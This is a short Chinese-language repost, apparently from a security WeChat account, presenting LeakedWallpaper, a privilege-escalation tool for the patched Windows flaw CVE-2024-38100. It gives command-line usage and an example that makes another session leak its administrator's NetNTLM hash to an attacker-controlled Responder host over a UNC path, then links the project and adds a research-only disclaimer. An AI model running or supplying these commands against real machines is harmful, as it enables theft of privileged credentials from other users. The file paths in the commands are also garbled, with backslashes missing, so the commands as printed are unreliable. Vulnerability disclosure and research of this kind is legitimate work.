这是一个权限提升工具(已使用 KB5040434 中的 CVE-2024-38100 修复),它允许我们从计算机上的任何会话中泄露用户的 NetNTLM 哈希,即使我们以低权限用户的身份工作。
用法
.LeakedWallpaper.exe <session> \<KALI IP>c$1.jpg [-downgrade]
# Example
.LeakedWallpaper.exe 1 \172.16.0.5c$1.jpg -downgrade
Photos
假设我们在主机上有两个会话:
-
管理员是一个特权账户,它的 NetNTLM 哈希就是我们想要获取的
-
exploit 是一个低权限账户,我们正在利用它进行操作。
当前会话 ID:2 目标会话 ID:1
响应者 IP:172.16.0.5 Windows IP:172.16.0.2
让我们使用该工具获取管理员 NetNTLM-hash!
.LeakedWallpaper 1 \172.16.0.5c$1.jpg
演示:
项目地址:
https://github.com/MzHmO/LeakedWallpaper
原文始发于微信公众号(Ots安全):CVE-2024-38100 任何用户的 NetNTLM 哈希值泄露-已修复 KB5040434
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论